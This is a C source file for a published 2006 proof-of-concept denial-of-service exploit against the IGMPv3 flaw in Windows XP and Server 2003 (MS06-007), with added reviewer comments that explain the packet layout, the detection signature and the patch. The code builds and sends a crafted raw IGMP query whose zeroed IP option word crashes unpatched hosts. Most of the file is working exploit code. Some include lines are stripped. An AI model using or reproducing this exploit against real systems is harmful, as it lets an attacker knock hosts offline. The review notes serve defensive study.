/* IGMP v3 DoS Exploit
   ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
   ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx
   by Alexey Sintsov (dookie@inbox.ru)
   Req: Administrator rights on system
        Windows Firewall off (for sending RAW packets)
   Affected Products:
        Microsoft Corporation Windows XP All
        Microsoft Corporation Windows Server 2003 All */

/*
 * Review notes (defender's reading of this listing):
 *  - Proof-of-concept for the issue addressed by the MS06-007 bulletin
 *    referenced above; the fix for affected hosts is that update.
 *  - The program sends ONE crafted datagram: a 24-byte IPv4 header
 *    (version 4, IHL 6, i.e. 20 standard bytes plus a zeroed 4-byte
 *    option word) carrying a 16-byte IGMPv3 Membership Query (type 0x11).
 *    An IGMP query with IP options present is the on-wire characteristic
 *    of this PoC and is what a network monitor would key on.
 *  - Windows-only: it relies on Winsock raw sockets and on 32-bit
 *    `unsigned long`, see the struct notes below.
 */

/* NOTE(review): the header names after both #include directives were lost
 * in extraction (angle-bracket text stripped); the Winsock and stdio
 * declarations used below come from them -- confirm against the original. */
#include
#include
#pragma comment(lib, "Ws2_32.lib")

/* IPv4 header as sent by this program. Field order follows the wire format;
 * the trailing options[2] adds one 32-bit option word, so sizeof == 24 and
 * the IHL written into verlen below is 6. All multi-byte fields are stored
 * in network byte order by the caller. */
typedef struct iphdr {
    unsigned char verlen;          // IP version & length
    unsigned char tos;             // Type of service
    unsigned short total_len;      // Total length of the packet
    unsigned short ident;          // Unique identifier
    unsigned short frag_and_flags; // Flags
    unsigned char ttl;             // Time to live
    unsigned char proto;           // Protocol (TCP, UDP etc)
    unsigned short checksum;       // IP checksum
    unsigned int sourceIP;         // Source IP
    unsigned int destIP;           // Destination IP
    unsigned short options[2];     // one 32-bit option word (zeroed below)
} IPHEADER;

/* IGMPv3 Membership Query layout (RFC 3376 field order) with exactly one
 * source address appended. sizeof == 16 only where `unsigned long` is
 * 4 bytes (Win32, the stated target); on an LP64 platform the two `long`
 * fields would be 8 bytes and the layout would no longer match the wire. */
typedef struct igmphdr {
    unsigned char type;       // 0x11 = Membership Query
    unsigned char code;       // Max Resp Code byte
    unsigned short checksum;  // one's-complement checksum over the 16 bytes
    unsigned long group;      // Group Address
    unsigned char ResvSQVR;   // Resv / S / QRV byte
    unsigned char QQIC;       // Querier's Query Interval Code
    unsigned short num;       // Number of Sources
    unsigned long addes;      // first (and only) Source Address
} IGMPHEADER;

/*
 * RFC 1071 Internet checksum.
 * @param buffer  data to sum, read as 16-bit words in memory order
 * @param size    length in bytes; an odd trailing byte is added as-is
 * @return        one's complement of the folded sum, in memory (wire) order,
 *                so the result can be stored into a header field without
 *                further byte swapping.
 */
USHORT checksum(USHORT *buffer, int size) {
    unsigned long cksum=0;
    while (size > 1) {
        cksum += *buffer++;
        size -= sizeof(USHORT);
    }
    if (size) cksum += *(UCHAR*)buffer;          // odd trailing byte
    cksum = (cksum >> 16) + (cksum & 0xffff);   // fold carries into 16 bits
    cksum += (cksum >>16);                      // fold the carry that folding may produce
    return (USHORT)(~cksum);
}

/*
 * Build and send the single 40-byte IPv4+IGMPv3 datagram.
 * @param a  source address as dotted-quad text (parsed with inet_addr;
 *           the INADDR_NONE failure value is not checked)
 * @param b  destination address as dotted-quad text (same caveat)
 * @return   1 on successful sendto; FALSE (0) on WSAStartup/socket/
 *           setsockopt failure and 0 on send failure -- the two failure
 *           values are indistinguishable to the caller.
 * Side effects: prints an error message on failure; initializes and tears
 * down Winsock on every call. Requires raw-socket privilege (see header).
 */
int sendIGMP(char* a, char* b) {
    unsigned int dst_addr, src_addr;
    IPHEADER ipHeader;
    IGMPHEADER igmpHeader;
    dst_addr=inet_addr (b);
    src_addr=inet_addr (a);
    char szSendBuf[60]={0};   // zero-filled; only the first 40 bytes are sent
    int rect;
    WSADATA WSAData;
    if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0) return FALSE;
    SOCKET sock;
    /* 0x01 as the flags argument is presumably WSA_FLAG_OVERLAPPED -- confirm. */
    if ((sock = WSASocket(AF_INET,SOCK_RAW, IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) {
        printf("Create socket error");
        WSACleanup();
        return FALSE;
    }
    BOOL flag=TRUE;
    /* Option 2 at level IPPROTO_IP is the numeric value of IP_HDRINCL on
     * Winsock: the IP header supplied in szSendBuf is sent as given. */
    if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
        printf("Set options error");
        closesocket(sock);
        WSACleanup();
        return FALSE;
    }
    SOCKADDR_IN ssin;
    memset(&ssin, 0, sizeof(ssin));
    ssin.sin_family=AF_INET;
    ssin.sin_port=htons(99);   // no port semantics on a raw IP socket; value looks arbitrary
    ssin.sin_addr.s_addr=dst_addr;
    /* version 4 in the high nibble, IHL = sizeof(ipHeader)/4 in the low
     * nibble -- 6 when unsigned long is 4 bytes, i.e. 0x46. */
    ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
    ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader));   // 24 + 16 = 40
    ipHeader.ident=htons(0);
    ipHeader.frag_and_flags=0;
    ipHeader.ttl=128;
    ipHeader.proto=IPPROTO_IGMP;
    ipHeader.checksum=0;
    ipHeader.tos=0;
    ipHeader.destIP=dst_addr;
    ipHeader.sourceIP=src_addr;
    //Ip options
    /* Four 0x00 option bytes fill the extra header word; the author marks
     * this option word as the trigger for the MS06-007 issue. */
    ipHeader.options[0]=htons(0x0000); //bug is here =)
    ipHeader.options[1]=htons(0x0000);
    igmpHeader.type=0x11; //v3 Membership Query
    igmpHeader.code=5;
    igmpHeader.num=htons(1);              // one source address follows
    igmpHeader.ResvSQVR=0x0;
    igmpHeader.QQIC=0;
    igmpHeader.group=inet_addr("0.0.0.0"); // general query (group 0.0.0.0)
    igmpHeader.addes=dst_addr;
    igmpHeader.checksum=0;
    /* IGMP checksum is computed over the 16 IGMP bytes alone, staged at the
     * start of the buffer, with the checksum field zeroed. */
    memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader));
    igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader));
    /* Lay out the datagram: IP header, then the checksummed IGMP header. */
    memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
    memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));
    /* Redundant: bytes 40..43 are already zero and are not part of the send. */
    memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);
    /* IP checksum here is taken over all 40 bytes (header plus IGMP payload)
     * and, unlike the IGMP checksum above, passed through ntohs(). */
    ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader)));
    memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
    rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));
    if (rect==SOCKET_ERROR) {
        printf("Send error: <%d>\n",WSAGetLastError());
        closesocket(sock);
        WSACleanup();
        return 0;
    }
    closesocket(sock);
    WSACleanup();
    return 1;
}

/*
 * Entry point (implicit int, pre-C99 style).
 * argv[1] is the destination, argv[2] the source address (note the swapped
 * order in the sendIGMP call). The guard only rejects argc < 2, so with a
 * single argument argv[2] is the terminating NULL and is handed to
 * inet_addr(). sendIGMP's return value is ignored; exit status is always 0.
 */
main(int argc, char **argv) {
    if(argc<2) {
        printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n");
        printf("Usage:\n");
        /* The argument placeholders after the program name appear to have
         * been stripped from this string in extraction (angle-bracket text). */
        printf("c:\\igmps.exe \n\n");
        exit(0);
    }
    sendIGMP(argv[2], argv[1]);
    return 0;
}

// milw0rm.com [2006-03-21]